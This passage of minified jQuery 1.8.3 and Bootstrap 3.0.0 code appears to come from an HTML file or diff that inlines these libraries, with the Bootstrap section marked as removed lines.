e=="object"&&(n=e,e=t),n=n||{};var r,i,s,o,u,a,f,l,c=v.ajaxSetup({},n),h=c.context||c,p=h!==c&&(h.nodeType||h instanceof v)?v(h):v.event,d=v.Deferred(),m=v.Callbacks("once memory"),g=c.statusCode||{},b={},w={},E=0,S="canceled",x={readyState:0,setRequestHeader:function(e,t){if(!E){var n=e.toLowerCase();e=w[n]=w[n]||e,b[e]=t}return this},getAllResponseHeaders:function(){return E===2?i:null},getResponseHeader:function(e){var n;if(E===2){if(!s){s={};while(n=pn.exec(i))s[n[1].toLowerCase()]=n[2]}n=s[e.toLowerCase()]}return n===t?null:n},overrideMimeType:function(e){return E||(c.mimeType=e),this},abort:function(e){return e=e||S,o&&o.abort(e),T(0,e),this}};d.promise(x),x.success=x.done,x.error=x.fail,x.complete=m.add,x.statusCode=function(e){if(e){var t;if(E<2)for(t in e)g[t]=[g[t],e[t]];else t=e[x.status],x.always(t)}return this},c.url=((e||c.url)+"").replace(hn,"").replace(mn,ln[1]+"//"),c.dataTypes=v.trim(c.dataType||"*").toLowerCase().split(y),c.crossDomain==null&&(a=wn.exec(c.url.toLowerCase()),c.crossDomain=!(!a||a[1]===ln[1]&&a[2]===ln[2]&&(a[3]||(a[1]==="http:"?80:443))==(ln[3]||(ln[1]==="http:"?80:443)))),c.data&&c.processData&&typeof c.data!="string"&&(c.data=v.param(c.data,c.traditional)),kn(Sn,c,n,x);if(E===2)return x;f=c.global,c.type=c.type.toUpperCase(),c.hasContent=!vn.test(c.type),f&&v.active++===0&&v.event.trigger("ajaxStart");if(!c.hasContent){c.data&&(c.url+=(gn.test(c.url)?"&":"?")+c.data,delete c.data),r=c.url;if(c.cache===!1){var N=v.now(),C=c.url.replace(bn,"$1_="+N);c.url=C+(C===c.url?(gn.test(c.url)?"&":"?")+"_="+N:"")}}(c.data&&c.hasContent&&c.contentType!==!1||n.contentType)&&x.setRequestHeader("Content-Type",c.contentType),c.ifModified&&(r=r||c.url,v.lastModified[r]&&x.setRequestHeader("If-Modified-Since",v.lastModified[r]),v.etag[r]&&x.setRequestHeader("If-None-Match",v.etag[r])),x.setRequestHeader("Accept",c.dataTypes[0]&&c.accepts[c.dataTypes[0]]?c.accepts[c.dataTypes[0]]+(c.dataTypes[0]!=="*"?", "+Tn+"; q=0.01":""):c.accepts["*"]);for(l in c.headers)x.setRequestHeader(l,c.headers[l]);if(!c.beforeSend||c.beforeSend.call(h,x,c)!==!1&&E!==2){S="abort";for(l in{success:1,error:1,complete:1})x[l](c[l]);o=kn(xn,c,n,x);if(!o)T(-1,"No Transport");else{x.readyState=1,f&&p.trigger("ajaxSend",[x,c]),c.async&&c.timeout>0&&(u=setTimeout(function(){x.abort("timeout")},c.timeout));try{E=1,o.send(b,T)}catch(k){if(!(E<2))throw k;T(-1,k)}}return x}return x.abort()},active:0,lastModified:{},etag:{}});var Mn=[],_n=/\?/,Dn=/(=)\?(?=&|$)|\?\?/,Pn=v.now();v.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Mn.pop()||v.expando+"_"+Pn++;return this[e]=!0,e}}),v.ajaxPrefilter("json jsonp",function(n,r,i){var s,o,u,a=n.data,f=n.url,l=n.jsonp!==!1,c=l&&Dn.test(f),h=l&&!c&&typeof a=="string"&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Dn.test(a);if(n.dataTypes[0]==="jsonp"||c||h)return s=n.jsonpCallback=v.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,o=e[s],c?n.url=f.replace(Dn,"$1"+s):h?n.data=a.replace(Dn,"$1"+s):l&&(n.url+=(_n.test(f)?"&":"?")+n.jsonp+"="+s),n.converters["script json"]=function(){return u||v.error(s+" was not called"),u[0]},n.dataTypes[0]="json",e[s]=function(){u=arguments},i.always(function(){e[s]=o,n[s]&&(n.jsonpCallback=r.jsonpCallback,Mn.push(s)),u&&v.isFunction(o)&&o(u[0]),u=o=t}),"script"}),v.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(e){return v.globalEval(e),e}}}),v.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),v.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=i.head||i.getElementsByTagName("head")[0]||i.documentElement;return{send:function(s,o){n=i.createElement("script"),n.async="async",e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,i){if(i||!n.readyState||/loaded|complete/.test(n.readyState))n.onload=n.onreadystatechange=null,r&&n.parentNode&&r.removeChild(n),n=t,i||o(200,"success")},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(0,1)}}}});var Hn,Bn=e.ActiveXObject?function(){for(var e in Hn)Hn[e](0,1)}:!1,jn=0;v.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&Fn()||In()}:Fn,function(e){v.extend(v.support,{ajax:!!e,cors:!!e&&"withCredentials"in e})}(v.ajaxSettings.xhr()),v.support.ajax&&v.ajaxTransport(function(n){if(!n.crossDomain||v.support.cors){var r;return{send:function(i,s){var o,u,a=n.xhr();n.username?a.open(n.type,n.url,n.async,n.username,n.password):a.open(n.type,n.url,n.async);if(n.xhrFields)for(u in n.xhrFields)a[u]=n.xhrFields[u];n.mimeType&&a.overrideMimeType&&a.overrideMimeType(n.mimeType),!n.crossDomain&&!i["X-Requested-With"]&&(i["X-Requested-With"]="XMLHttpRequest");try{for(u in i)a.setRequestHeader(u,i[u])}catch(f){}a.send(n.hasContent&&n.data||null),r=function(e,i){var u,f,l,c,h;try{if(r&&(i||a.readyState===4)){r=t,o&&(a.onreadystatechange=v.noop,Bn&&delete Hn[o]);if(i)a.readyState!==4&&a.abort();else{u=a.status,l=a.getAllResponseHeaders(),c={},h=a.responseXML,h&&h.documentElement&&(c.xml=h);try{c.text=a.responseText}catch(p){}try{f=a.statusText}catch(p){f=""}!u&&n.isLocal&&!n.crossDomain?u=c.text?200:404:u===1223&&(u=204)}}}catch(d){i||s(-1,d)}c&&s(u,f,c,l)},n.async?a.readyState===4?setTimeout(r,0):(o=++jn,Bn&&(Hn||(Hn={},v(e).unload(Bn)),Hn[o]=r),a.onreadystatechange=r):r()},abort:function(){r&&r(0,1)}}}});var qn,Rn,Un=/^(?:toggle|show|hide)$/,zn=new RegExp("^(?:([-+])=|)("+m+")([a-z%]*)$","i"),Wn=/queueHooks$/,Xn=[Gn],Vn={"*":[function(e,t){var n,r,i=this.createTween(e,t),s=zn.exec(t),o=i.cur(),u=+o||0,a=1,f=20;if(s){n=+s[2],r=s[3]||(v.cssNumber[e]?"":"px");if(r!=="px"&&u){u=v.css(i.elem,e,!0)||n||1;do a=a||".5",u/=a,v.style(i.elem,e,u+r);while(a!==(a=i.cur()/o)&&a!==1&&--f)}i.unit=r,i.start=u,i.end=s[1]?u+(s[1]+1)*n:n}return i}]};v.Animation=v.extend(Kn,{tweener:function(e,t){v.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");var n,r=0,i=e.length;for(;r<i;r++)n=e[r],Vn[n]=Vn[n]||[],Vn[n].unshift(t)},prefilter:function(e,t){t?Xn.unshift(e):Xn.push(e)}}),v.Tween=Yn,Yn.prototype={constructor:Yn,init:function(e,t,n,r,i,s){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=s||(v.cssNumber[n]?"":"px")},cur:function(){var e=Yn.propHooks[this.prop];return e&&e.get?e.get(this):Yn.propHooks._default.get(this)},run:function(e){var t,n=Yn.propHooks[this.prop];return this.options.duration?this.pos=t=v.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):this.pos=t=e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):Yn.propHooks._default.set(this),this}},Yn.prototype.init.prototype=Yn.prototype,Yn.propHooks={_default:{get:function(e){var t;return e.elem[e.prop]==null||!!e.elem.style&&e.elem.style[e.prop]!=null?(t=v.css(e.elem,e.prop,!1,""),!t||t==="auto"?0:t):e.elem[e.prop]},set:function(e){v.fx.step[e.prop]?v.fx.step[e.prop](e):e.elem.style&&(e.elem.style[v.cssProps[e.prop]]!=null||v.cssHooks[e.prop])?v.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},Yn.propHooks.scrollTop=Yn.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},v.each(["toggle","show","hide"],function(e,t){var n=v.fn[t];v.fn[t]=function(r,i,s){return r==null||typeof r=="boolean"||!e&&v.isFunction(r)&&v.isFunction(i)?n.apply(this,arguments):this.animate(Zn(t,!0),r,i,s)}}),v.fn.extend({fadeTo:function(e,t,n,r){return this.filter(Gt).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=v.isEmptyObject(e),s=v.speed(t,n,r),o=function(){var t=Kn(this,v.extend({},e),s);i&&t.stop(!0)};return i||s.queue===!1?this.each(o):this.queue(s.queue,o)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return typeof e!="string"&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=e!=null&&e+"queueHooks",s=v.timers,o=v._data(this);if(n)o[n]&&o[n].stop&&i(o[n]);else for(n in o)o[n]&&o[n].stop&&Wn.test(n)&&i(o[n]);for(n=s.length;n--;)s[n].elem===this&&(e==null||s[n].queue===e)&&(s[n].anim.stop(r),t=!1,s.splice(n,1));(t||!r)&&v.dequeue(this,e)})}}),v.each({slideDown:Zn("show"),slideUp:Zn("hide"),slideToggle:Zn("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){v.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),v.speed=function(e,t,n){var r=e&&typeof e=="object"?v.extend({},e):{complete:n||!n&&t||v.isFunction(e)&&e,duration:e,easing:n&&t||t&&!v.isFunction(t)&&t};r.duration=v.fx.off?0:typeof r.duration=="number"?r.duration:r.duration in v.fx.speeds?v.fx.speeds[r.duration]:v.fx.speeds._default;if(r.queue==null||r.queue===!0)r.queue="fx";return r.old=r.complete,r.complete=function(){v.isFunction(r.old)&&r.old.call(this),r.queue&&v.dequeue(this,r.queue)},r},v.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},v.timers=[],v.fx=Yn.prototype.init,v.fx.tick=function(){var e,n=v.timers,r=0;qn=v.now();for(;r<n.length;r++)e=n[r],!e()&&n[r]===e&&n.splice(r--,1);n.length||v.fx.stop(),qn=t},v.fx.timer=function(e){e()&&v.timers.push(e)&&!Rn&&(Rn=setInterval(v.fx.tick,v.fx.interval))},v.fx.interval=13,v.fx.stop=function(){clearInterval(Rn),Rn=null},v.fx.speeds={slow:600,fast:200,_default:400},v.fx.step={},v.expr&&v.expr.filters&&(v.expr.filters.animated=function(e){return v.grep(v.timers,function(t){return e===t.elem}).length});var er=/^(?:body|html)$/i;v.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){v.offset.setOffset(this,e,t)});var n,r,i,s,o,u,a,f={top:0,left:0},l=this[0],c=l&&l.ownerDocument;if(!c)return;return(r=c.body)===l?v.offset.bodyOffset(l):(n=c.documentElement,v.contains(n,l)?(typeof l.getBoundingClientRect!="undefined"&&(f=l.getBoundingClientRect()),i=tr(c),s=n.clientTop||r.clientTop||0,o=n.clientLeft||r.clientLeft||0,u=i.pageYOffset||n.scrollTop,a=i.pageXOffset||n.scrollLeft,{top:f.top+u-s,left:f.left+a-o}):f)},v.offset={bodyOffset:function(e){var t=e.offsetTop,n=e.offsetLeft;return v.support.doesNotIncludeMarginInBodyOffset&&(t+=parseFloat(v.css(e,"marginTop"))||0,n+=parseFloat(v.css(e,"marginLeft"))||0),{top:t,left:n}},setOffset:function(e,t,n){var r=v.css(e,"position");r==="static"&&(e.style.position="relative");var i=v(e),s=i.offset(),o=v.css(e,"top"),u=v.css(e,"left"),a=(r==="absolute"||r==="fixed")&&v.inArray("auto",[o,u])>-1,f={},l={},c,h;a?(l=i.position(),c=l.top,h=l.left):(c=parseFloat(o)||0,h=parseFloat(u)||0),v.isFunction(t)&&(t=t.call(e,n,s)),t.top!=null&&(f.top=t.top-s.top+c),t.left!=null&&(f.left=t.left-s.left+h),"using"in t?t.using.call(e,f):i.css(f)}},v.fn.extend({position:function(){if(!this[0])return;var e=this[0],t=this.offsetParent(),n=this.offset(),r=er.test(t[0].nodeName)?{top:0,left:0}:t.offset();return n.top-=parseFloat(v.css(e,"marginTop"))||0,n.left-=parseFloat(v.css(e,"marginLeft"))||0,r.top+=parseFloat(v.css(t[0],"borderTopWidth"))||0,r.left+=parseFloat(v.css(t[0],"borderLeftWidth"))||0,{top:n.top-r.top,left:n.left-r.left}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||i.body;while(e&&!er.test(e.nodeName)&&v.css(e,"position")==="static")e=e.offsetParent;return e||i.body})}}),v.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);v.fn[e]=function(i){return v.access(this,function(e,i,s){var o=tr(e);if(s===t)return o?n in o?o[n]:o.document.documentElement[i]:e[i];o?o.scrollTo(r?v(o).scrollLeft():s,r?s:v(o).scrollTop()):e[i]=s},e,i,arguments.length,null)}}),v.each({Height:"height",Width:"width"},function(e,n){v.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){v.fn[i]=function(i,s){var o=arguments.length&&(r||typeof i!="boolean"),u=r||(i===!0||s===!0?"margin":"border");return v.access(this,function(n,r,i){var s;return v.isWindow(n)?n.document.documentElement["client"+e]:n.nodeType===9?(s=n.documentElement,Math.max(n.body["scroll"+e],s["scroll"+e],n.body["offset"+e],s["offset"+e],s["client"+e])):i===t?v.css(n,r,i,u):v.style(n,r,i,u)},n,o?i:t,o,null)}})}),e.jQuery=e.$=v,typeof define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return v})})(window);</script>
-<!-- END extlib/js/jquery-1.8.3.min.js -->
-<!-- START extlib/js/bootstrap-3.0.0.min.js -->
-<script type="text/javascript">/**
-* bootstrap.js v3.0.0 by @fat and @mdo
-* Copyright 2013 Twitter Inc.
-* http://www.apache.org/licenses/LICENSE-2.0
-*/
-if(!jQuery)throw new Error("Bootstrap requires jQuery");+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]}}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one(a.support.transition.end,function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b()})}(window.jQuery),+function(a){"use strict";var b='[data-dismiss="alert"]',c=function(c){a(c).on("click",b,this.close)};c.prototype.close=function(b){function c(){f.trigger("closed.bs.alert").remove()}var d=a(this),e=d.attr("data-target");e||(e=d.attr("href"),e=e&&e.replace(/.*(?=#[^\s]*$)/,""));var f=a(e);b&&b.preventDefault(),f.length||(f=d.hasClass("alert")?d:d.parent()),f.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(f.removeClass("in"),a.support.transition&&f.hasClass("fade")?f.one(a.support.transition.end,c).emulateTransitionEnd(150):c())};var d=a.fn.alert;a.fn.alert=function(b){return this.each(function(){var d=a(this),e=d.data("bs.alert");e||d.data("bs.alert",e=new c(this)),"string"==typeof b&&e[b].call(d)})},a.fn.alert.Constructor=c,a.fn.alert.noConflict=function(){return a.fn.alert=d,this},a(document).on("click.bs.alert.data-api",b,c.prototype.close)}(window.jQuery),+function(a){"use strict";var b=function(c,d){this.$element=a(c),this.options=a.extend({},b.DEFAULTS,d)};b.DEFAULTS={loadingText:"loading..."},b.prototype.setState=function(a){var b="disabled",c=this.$element,d=c.is("input")?"val":"html",e=c.data();a+="Text",e.resetText||c.data("resetText",c[d]()),c[d](e[a]||this.options[a]),setTimeout(function(){"loadingText"==a?c.addClass(b).attr(b,b):c.removeClass(b).removeAttr(b)},0)},b.prototype.toggle=function(){var a=this.$element.closest('[data-toggle="buttons"]');if(a.length){var b=this.$element.find("input").prop("checked",!this.$element.hasClass("active")).trigger("change");"radio"===b.prop("type")&&a.find(".active").removeClass("active")}this.$element.toggleClass("active")};var c=a.fn.button;a.fn.button=function(c){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof c&&c;e||d.data("bs.button",e=new b(this,f)),"toggle"==c?e.toggle():c&&e.setState(c)})},a.fn.button.Constructor=b,a.fn.button.noConflict=function(){return a.fn.button=c,this},a(document).on("click.bs.button.data-api","[data-toggle^=button]",function(b){var c=a(b.target);c.hasClass("btn")||(c=c.closest(".btn")),c.button("toggle"),b.preventDefault()})}(window.jQuery),+function(a){"use strict";var b=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=this.sliding=this.interval=this.$active=this.$items=null,"hover"==this.options.pause&&this.$element.on("mouseenter",a.proxy(this.pause,this)).on("mouseleave",a.proxy(this.cycle,this))};b.DEFAULTS={interval:5e3,pause:"hover",wrap:!0},b.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},b.prototype.getActiveIndex=function(){return this.$active=this.$element.find(".item.active"),this.$items=this.$active.parent().children(),this.$items.index(this.$active)},b.prototype.to=function(b){var c=this,d=this.getActiveIndex();return b>this.$items.length-1||0>b?void 0:this.sliding?this.$element.one("slid",function(){c.to(b)}):d==b?this.pause().cycle():this.slide(b>d?"next":"prev",a(this.$items[b]))},b.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition.end&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},b.prototype.next=function(){return this.sliding?void 0:this.slide("next")},b.prototype.prev=function(){return this.sliding?void 0:this.slide("prev")},b.prototype.slide=function(b,c){var d=this.$element.find(".item.active"),e=c||d[b](),f=this.interval,g="next"==b?"left":"right",h="next"==b?"first":"last",i=this;if(!e.length){if(!this.options.wrap)return;e=this.$element.find(".item")[h]()}this.sliding=!0,f&&this.pause();var j=a.Event("slide.bs.carousel",{relatedTarget:e[0],direction:g});if(!e.hasClass("active")){if(this.$indicators.length&&(this.$indicators.find(".active").removeClass("active"),this.$element.one("slid",function(){var b=a(i.$indicators.children()[i.getActiveIndex()]);b&&b.addClass("active")})),a.support.transition&&this.$element.hasClass("slide")){if(this.$element.trigger(j),j.isDefaultPrevented())return;e.addClass(b),e[0].offsetWidth,d.addClass(g),e.addClass(g),d.one(a.support.transition.end,function(){e.removeClass([b,g].join(" ")).addClass("active"),d.removeClass(["active",g].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger("slid")},0)}).emulateTransitionEnd(600)}else{if(this.$element.trigger(j),j.isDefaultPrevented())return;d.removeClass("active"),e.addClass("active"),this.sliding=!1,this.$element.trigger("slid")}return f&&this.cycle(),this}};var c=a.fn.carousel;a.fn.carousel=function(c){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},b.DEFAULTS,d.data(),"object"==typeof c&&c),g="string"==typeof c?c:f.slide;e||d.data("bs.carousel",e=new b(this,f)),"number"==typeof c?e.to(c):g?e[g]():f.interval&&e.pause().cycle()})},a.fn.carousel.Constructor=b,a.fn.carousel.noConflict=function(){return a.fn.carousel=c,this},a(document).on("click.bs.carousel.data-api","[data-slide], [data-slide-to]",function(b){var c,d=a(this),e=a(d.attr("data-target")||(c=d.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"")),f=a.extend({},e.data(),d.data()),g=d.attr("data-slide-to");g&&(f.interval=!1),e.carousel(f),(g=d.attr("data-slide-to"))&&e.data("bs.carousel").to(g),b.preventDefault()}),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var b=a(this);b.carousel(b.data())})})}(window.jQuery),+function(a){"use strict";var b=function(c,d){this.$element=a(c),this.options=a.extend({},b.DEFAULTS,d),this.transitioning=null,this.options.parent&&(this.$parent=a(this.options.parent)),this.options.toggle&&this.toggle()};b.DEFAULTS={toggle:!0},b.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},b.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b=a.Event("show.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.$parent&&this.$parent.find("> .panel > .in");if(c&&c.length){var d=c.data("bs.collapse");if(d&&d.transitioning)return;c.collapse("hide"),d||c.data("bs.collapse",null)}var e=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[e](0),this.transitioning=1;var f=function(){this.$element.removeClass("collapsing").addClass("in")[e]("auto"),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return f.call(this);var g=a.camelCase(["scroll",e].join("-"));this.$element.one(a.support.transition.end,a.proxy(f,this)).emulateTransitionEnd(350)[e](this.$element[0][g])}}},b.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse").removeClass("in"),this.transitioning=1;var d=function(){this.transitioning=0,this.$element.trigger("hidden.bs.collapse").removeClass("collapsing").addClass("collapse")};return a.support.transition?(this.$element[c](0).one(a.support.transition.end,a.proxy(d,this)).emulateTransitionEnd(350),void 0):d.call(this)}}},b.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()};var c=a.fn.collapse;a.fn.collapse=function(c){return this.each(function(){var d=a(this),e=d.data("bs.collapse"),f=a.extend({},b.DEFAULTS,d.data(),"object"==typeof c&&c);e||d.data("bs.collapse",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.collapse.Constructor=b,a.fn.collapse.noConflict=function(){return a.fn.collapse=c,this},a(document).on("click.bs.collapse.data-api","[data-toggle=collapse]",function(b){var c,d=a(this),e=d.attr("data-target")||b.preventDefault()||(c=d.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,""),f=a(e),g=f.data("bs.collapse"),h=g?"toggle":d.data(),i=d.attr("data-parent"),j=i&&a(i);g&&g.transitioning||(j&&j.find('[data-toggle=collapse][data-parent="'+i+'"]').not(d).addClass("collapsed"),d[f.hasClass("in")?"addClass":"removeClass"]("collapsed")),f.collapse(h)})}(window.jQuery),+function(a){"use strict";function b(){a(d).remove(),a(e).each(function(b){var d=c(a(this));d.hasClass("open")&&(d.trigger(b=a.Event("hide.bs.dropdown")),b.isDefaultPrevented()||d.removeClass("open").trigger("hidden.bs.dropdown"))})}function c(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}var d=".dropdown-backdrop",e="[data-toggle=dropdown]",f=function(b){a(b).on("click.bs.dropdown",this.toggle)};f.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=c(e),g=f.hasClass("open");if(b(),!g){if("ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a('<div class="dropdown-backdrop"/>').insertAfter(a(this)).on("click",b),f.trigger(d=a.Event("show.bs.dropdown")),d.isDefaultPrevented())return;f.toggleClass("open").trigger("shown.bs.dropdown"),e.focus()}return!1}},f.prototype.keydown=function(b){if(/(38|40|27)/.test(b.keyCode)){var d=a(this);if(b.preventDefault(),b.stopPropagation(),!d.is(".disabled, :disabled")){var f=c(d),g=f.hasClass("open");if(!g||g&&27==b.keyCode)return 27==b.which&&f.find(e).focus(),d.click();var h=a("[role=menu] li:not(.divider):visible a",f);if(h.length){var i=h.index(h.filter(":focus"));38==b.keyCode&&i>0&&i--,40==b.keyCode&&i<h.length-1&&i++,~i||(i=0),h.eq(i).focus()}}}};var g=a.fn.dropdown;a.fn.dropdown=function(b){return this.each(function(){var c=a(this),d=c.data("dropdown");d||c.data("dropdown",d=new f(this)),"string"==typeof b&&d[b].call(c)})},a.fn.dropdown.Constructor=f,a.fn.dropdown.noConflict=function(){return a.fn.dropdown=g,this},a(document).on("click.bs.dropdown.data-api",b).on("click.bs.dropdown.data-api",".dropdown form",function(a){a.stopPropagation()}).on("click.bs.dropdown.data-api",e,f.prototype.toggle).on("keydown.bs.dropdown.data-api",e+", [role=menu]",f.prototype.keydown)}(window.jQuery),+function(a){"use strict";var b=function(b,c){this.options=c,this.$element=a(b),this.$backdrop=this.isShown=null,this.options.remote&&this.$element.load(this.options.remote)};b.DEFAULTS={backdrop:!0,keyboard:!0,show:!0},b.prototype.toggle=function(a){return this[this.isShown?"hide":"show"](a)},b.prototype.show=function(b){var c=this,d=a.Event("show.bs.modal",{relatedTarget:b});this.$element.trigger(d),this.isShown||d.isDefaultPrevented()||(this.isShown=!0,this.escape(),this.$element.on("click.dismiss.modal",'[data-dismiss="modal"]',a.proxy(this.hide,this)),this.backdrop(function(){var d=a.support.transition&&c.$element.hasClass("fade");c.$element.parent().length||c.$element.appendTo(document.body),c.$element.show(),d&&c.$element[0].offsetWidth,c.$element.addClass("in").attr("aria-hidden",!1),c.enforceFocus();var e=a.Event("shown.bs.modal",{relatedTarget:b});d?c.$element.find(".modal-dialog").one(a.support.transition.end,function(){c.$element.focus().trigger(e)}).emulateTransitionEnd(300):c.$element.focus().trigger(e)}))},b.prototype.hide=function(b){b&&b.preventDefault(),b=a.Event("hide.bs.modal"),this.$element.trigger(b),this.isShown&&!b.isDefaultPrevented()&&(this.isShown=!1,this.escape(),a(document).off("focusin.bs.modal"),this.$element.removeClass("in").attr("aria-hidden",!0).off("click.dismiss.modal"),a.support.transition&&this.$element.hasClass("fade")?this.$element.one(a.support.transition.end,a.proxy(this.hideModal,this)).emulateTransitionEnd(300):this.hideModal())},b.prototype.enforceFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(a){this.$element[0]===a.target||this.$element.has(a.target).length||this.$element.focus()},this))},b.prototype.escape=function(){this.isShown&&this.options.keyboard?this.$element.on("keyup.dismiss.bs.modal",a.proxy(function(a){27==a.which&&this.hide()},this)):this.isShown||this.$element.off("keyup.dismiss.bs.modal")},b.prototype.hideModal=function(){var a=this;this.$element.hide(),this.backdrop(function(){a.removeBackdrop(),a.$element.trigger("hidden.bs.modal")})},b.prototype.removeBackdrop=function(){this.$backdrop&&this.$backdrop.remove(),this.$backdrop=null},b.prototype.backdrop=function(b){var c=this.$element.hasClass("fade")?"fade":"";if(this.isShown&&this.options.backdrop){var d=a.support.transition&&c;if(this.$backdrop=a('<div class="modal-backdrop '+c+'" />').appendTo(document.body),this.$element.on("click.dismiss.modal",a.proxy(function(a){a.target===a.currentTarget&&("static"==this.options.backdrop?this.$element[0].focus.call(this.$element[0]):this.hide.call(this))},this)),d&&this.$backdrop[0].offsetWidth,this.$backdrop.addClass("in"),!b)return;d?this.$backdrop.one(a.support.transition.end,b).emulateTransitionEnd(150):b()}else!this.isShown&&this.$backdrop?(this.$backdrop.removeClass("in"),a.support.transition&&this.$element.hasClass("fade")?this.$backdrop.one(a.support.transition.end,b).emulateTransitionEnd(150):b()):b&&b()};var c=a.fn.modal;a.fn.modal=function(c,d){return this.each(function(){var e=a(this),f=e.data("bs.modal"),g=a.extend({},b.DEFAULTS,e.data(),"object"==typeof c&&c);f||e.data("bs.modal",f=new b(this,g)),"string"==typeof c?f[c](d):g.show&&f.show(d)})},a.fn.modal.Constructor=b,a.fn.modal.noConflict=function(){return a.fn.modal=c,this},a(document).on("click.bs.modal.data-api",'[data-toggle="modal"]',function(b){var c=a(this),d=c.attr("href"),e=a(c.attr("data-target")||d&&d.replace(/.*(?=#[^\s]+$)/,"")),f=e.data("modal")?"toggle":a.extend({remote:!/#/.test(d)&&d},e.data(),c.data());b.preventDefault(),e.modal(f,this).one("hide",function(){c.is(":visible")&&c.focus()})}),a(document).on("show.bs.modal",".modal",function(){a(document.body).addClass("modal-open")}).on("hidden.bs.modal",".modal",function(){a(document.body).removeClass("modal-open")})}(window.jQuery),+function(a){"use strict";var b=function(a,b){this.type=this.options=this.enabled=this.timeout=this.hoverState=this.$element=null,this.init("tooltip",a,b)};b.DEFAULTS={animation:!0,placement:"top",selector:!1,template:'<div class="tooltip"><div class="tooltip-arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,container:!1},b.prototype.init=function(b,c,d){this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d);for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focus",i="hover"==g?"mouseleave":"blur";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},b.prototype.getDefaults=function(){return b.DEFAULTS},b.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},b.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return 